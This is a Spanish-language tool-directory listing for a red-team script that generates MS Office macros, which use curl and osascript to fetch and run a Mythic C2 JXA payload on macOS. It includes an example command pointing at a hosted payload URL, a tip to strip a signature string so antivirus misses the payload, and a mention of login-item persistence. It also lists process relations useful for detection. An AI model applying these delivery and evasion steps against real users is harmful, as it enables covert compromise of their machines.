Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Mythic-Macro-Generator — Script en Python3 para generar una macro que lance un payload de Mythic. Autor: Cedric Owens | Kitploit
Herramientas/GitHubGitHub/cedowens/mythic-macro-generator
Herramientas de PhishingFrameworks de ExploitsGeneración de PayloadsPruebas de PenetraciónComando y ControlRed TeamingDesarrollo de Payloads
GitHubcedowens/mythic-macro-generator

Mythic-Macro-Generator

Script en Python3 para generar una macro que lance un payload de Mythic. Autor: Cedric Owens

Ver Repositorio
4795hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Mythic-Macro-Generator

Script en Python3 para generar macros de MS Office que lanzan payloads JXA de Mythic.

Este script genera una macro de Office que usa osascript para descargar y ejecutar el payload JXA .js de Mythic.

Pasos:

  1. Configura el servidor C2 de Mythic y genera un payload "apfell" jxa (nota: este generador asume que el payload usa http, no https... si usas https, puedes modificar el script del generador para que curl use https). Descarga ese payload en el servidor Mythic.

  2. Elimina la primera línea del lanzador JXA .js de Mythic ("// Created by Cody Thomas - @its_a_feature_"). Se sabe que algunas firmas estáticas de A/V verifican esta cadena estática. Aloja ese payload (ej: coloca el payload .js en una carpeta y usa python -m SimpleHTTPServer para alojarlo).

  3. Ejecuta este generador de macros:

python3 jxa-macro.py -u [url al payload .js alojado en el paso #2]

ejemplo: python3 jxa-macro.py -u http://192.168.1.1:8000/apfell2.js

  1. El texto de la macro se guardará en un archivo llamado "macro.txt" en el mismo directorio.

  2. Copia y pega esa macro en un documento de MS Office.


Detección:

Esta macro genera las siguientes relaciones padre-hijo que pueden usarse para detección:

Producto de Office (ej: Microsoft Word.app) --> /bin/sh

Producto de Office (ej: Microsoft Word.app) --> /bin/bash

Producto de Office (ej: Microsoft Word.app) --> /usr/bin/curl


Nota: Esto lanzará el payload JXA dentro del App Sandbox. Sin embargo, Mythic tiene la capacidad de agregar persistencia de Login Item incluso desde App Sandbox.

Descargar herramienta